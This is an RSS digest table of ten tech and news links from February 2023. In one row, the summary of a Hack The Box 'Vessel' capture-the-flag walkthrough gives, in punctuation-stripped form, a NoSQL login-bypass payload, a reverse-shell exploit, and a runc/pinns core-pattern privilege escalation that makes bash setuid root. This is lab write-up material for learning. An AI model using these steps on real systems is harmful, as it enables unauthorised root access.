Posted: 2023-02-18 16:09:10 RSS feed digest as of 2023-02-18 16:00 (10 items)
Category | Site name | Article title / trending word | Link URL | Frequent words / summary / search volume | Date registered |
---|---|---|---|---|---|
IT | ITmedia All Articles | [ITmedia Mobile] I get the feeling that mid-range smartphones have also become a little more expensive | https://www.itmedia.co.jp/mobile/articles/2302/18/news061.html | aquos | 2023-02-18 15:45:00 |
TECH | Techable | Earn money by gaming? Human Academy establishes a student-focused gaming guild for hands-on learning about NFTs | https://techable.jp/archives/195982 | latest technology | 2023-02-18 06:00:57 |
python | New posts tagged Python - Qiita | I want to collect soccer match data: data analysis | https://qiita.com/wooooo/items/ef97c50e6c8daa531420 | Kawasaki Frontale | 2023-02-18 15:43:16 |
Docker | New posts tagged docker - Qiita | How to check the Linux distribution | https://qiita.com/kaburankattara/items/ecc4c77303d4fb8c01ab | linux | 2023-02-18 15:15:33 |
Git | New posts tagged Git - Qiita | Summary of whether changes are synced when checking out in Git | https://qiita.com/f-suzuki/items/4c65950c71e3fe389348 | qiita | 2023-02-18 15:58:57 |
Git | New posts tagged Git - Qiita | Git and GitHub summarized from the basics [How to do team development on GitHub] | https://qiita.com/kanfutrooper/items/a9a5f9892c49f99c76ce | github | 2023-02-18 15:14:25 |
Overseas TECH | DEV Community | Hack The Box - Vessel [Hard] - Walkthrough | https://dev.to/syrull/hack-the-box-vessel-hard-walkthrough-a01 | Hack The Box Vessel Hard Walkthrough Overview Since it becomes very time consuming doing this in a video this write up is going to be in a text The machine is labeled hard with a good reason most of the tasks are time consuming but there are some interesting vulnerabilities like CVE and CVE On top of these we have NoSQL Injection and some PE reverse engineering Write up Flag First I began enumerating the whole website with ffuf ffuf w Tools SecLists Discovery Web Content common txt u fs With that I discovered a folder called dev which then led me to dumping the git repository of the website git dumper website dump With the website available I can check the actual source code for vulnerabilities immediately after opening the routes index js I have noticed that this code might be vulnerable to NoSQL Injection let username req body username let password req body password if username amp amp password connection query SELECT FROM accounts WHERE username AND password username password function error results fields The code doesn t check if the passed values if they are objects I can use a crafted NoSQL payload to successfully login with the admin user using this payload while doing the POST request username admin amp password password Upon another discovery in the admin panel I found that there is another domain on the host called openwebanalytics From further investigation over what can be exploited there I have landed on CVE With that exploit I could run a successful reverse shell on the machine Using linpeas I found some useful information over the user steven home steven passwordGenerator Windows PE Executable home steven notes screenshot png Screenshot of some program home steven notes notes pdf Password protected PDF I suspected that the screenshot png is an image of the passwordGenerator On the other hand the passwordGenerator was unusually big and the whole use of that binary is to create secure passwords I noticed the python icon on the binary and I suspected that this could be a packed python project with PyInstaller I confirmed that when I loaded the whole thing in Ghidra IDA I have used pyinstxtractor to extract the pyc files and then the uncomplyle to decompile the pyc files Which has led me to the actual source code of the binary This is the function that generates the password def genPassword self length value char index if char charset ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz amp lt gt else if char charset ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz else if char charset ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz else try qsrand QTime currentTime msec password for i in range length idx qrand len charset nchar charset idx password str nchar except msg QMessageBox msg setWindowTitle Error msg setText Error while generating password Send a message to the Author x msg exec return password I edited the length to as I have it on the screenshot and edited the script a bit more to create a list out of possible passwords I can do that because the QTime currentTime msec function returns the numbers from with that range I have a big chance of guessing the generated password Note This process can be a bit frustrating since it takes time to generate the passwords I personally spent little over an hour Then I used pdfcrack to crack the password of the PDF there I found the password for the user ethan and I successfully logged in with it and I found the first flag Flag I ran linpeas sh again and I found the following SUID binary ╔══════════╣Readable files belonging to root and readable by me but not world readable rwsr x root ethan Mar usr bin pinns I searched around a bit what is this and I landed on the CVE which exploited this binary While doing this I noticed that I also have the runc ╔══════════╣Container related tools present usr sbin runc This was a very tricky one and it needs some understanding of what s going on to successfully execute the attack You can check out the link I ve provided for CVE to understand more about it On the actual POC they have used Kubernetes on our end I had to use runc The parameters that are being passed to pinns are not being sanitized and validated so I can use that to execute code with root access I needed to create a container using the runc without using root so I ve used the rootless arg Reference rootless containers mkdir tmp syl cd tmp syl runc spec rootless mkdir rootfs echo chmod s usr bin bash gt syl sh Then I should mount the root to the root of the container Reference runc root tmp syl run alpine cat etc machine id ccaabdccafb This will run the container and spawn a shell Next I would ssh into the machine from another session to execute the pinns binary to our container usr bin pinns d var run f ccaabdccafb s kernel shm rmid forced kernel core pattern tmp syl syl sh ipc net uts cgroup Then I need to trigger a core dump so that the pinns would execute the script in a case of a core dump Following the PoC in crowdstrike ulimit c unlimited ulimit cunlimited tail f dev null amp ps Find the tail f dev null PID kill SIGSEGV thePID Segmentation fault core dumped tail f dev null Back to the other session bash p cat root root txt HASH | 2023-02-18 06:35:10 |
Overseas TECH | DEV Community | Tiny CRM - Linode + DEV Hackathon Submission | https://dev.to/frikishaan/tiny-crm-linode-dev-hackathon-submission-5gc1 | Tiny CRM Linode DEV Hackathon Submission What I built I have built a CRM Customer Relationship Management system named TinyCRM Category Submission I am submitting this project in the SaaS Superstars category As this project has a potential to become a profitable SaaS product App Link The demo of the application is available here Use the below credentials to login Email admin tinycrm com Password password Note The test data is refreshed every hour Screenshots Description This CRM systems help SMEs tracking their sales and manage the customer relationships easily This app has the following entities in it Account Stores the information of client organisation Contact Stores the information of the individual contacts in the client s organisation Lead Stores the information of Potential clients Deal Stores the information of Opportunities Products Stores the list of products that the company sell Link to Source Code frikishaan tiny crm This app created for hackathon on Dev to Tiny crm This is an app created for Linode hackathon on Dev Tech stack PHP Laravel Filament PHP Tailwind CSS Alpine JS PostgreSQL Live demo The live demo of app is available here Local Installation Clone the repository Run the following commands composer install installing php dependencies npm install installing the JS dependencies npm run build to build the frontend assets Replace the database credentials in the env file DB CONNECTION pgsql DB HOST DB PORT DB DATABASE tiny crm DB USERNAME postgres DB PASSWORD password Now run the following command to create the required tables in database php artisan migrate Optionally you can create the dummy data by running the seeder as php artisan db seed View on GitHub Permissive License MIT license Background There are a lot of CRM systems available in the market currently such as Salesforce Microsoft Dynamics etc The problem with these systems are that they are very broad and quite expensive and not easy to use and also needs a dedicated developer to manage it which becomes hard for SMEs to use and keep using these systems So I decided to make a CRM system which is easy to use have important required functionalities and at the same time not too expensive for SMEs How I built it I have used linode s compute instances for servers and the linode s managed PostgreSQL database for persistent storage While making this app I have learned to create compute instances in the linode s cloud platform I have also learned installing Nginx server and SSL certificate on the server I have also learned creating a managed database instance on cloud and why it is an easy solution for solo devs and small teams as one does not need to manage the database by themselves I have used Laravel web framework for creating the app I have also used Filament admin panel generator to quickly generate CRUD app functionality Additional Resources Info Built a website using Laravel framework on Linode Linode Products | 2023-02-18 06:04:06 |
Overseas TECH | CodeProject Latest Articles | Result Builder in Swift for MVVM Pattern | https://www.codeproject.com/Tips/5353219/Result-Builder-in-Swift-for-MVVM-Pattern | builder | 2023-02-18 06:44:00 |
News | BBC News - Home | The Papers: 'Rebellion' on NI Brexit deal and gas at 18-month low | https://www.bbc.co.uk/news/blogs-the-papers-64685148?at_medium=RSS&at_campaign=KARANGA | europe | 2023-02-18 06:00:47 |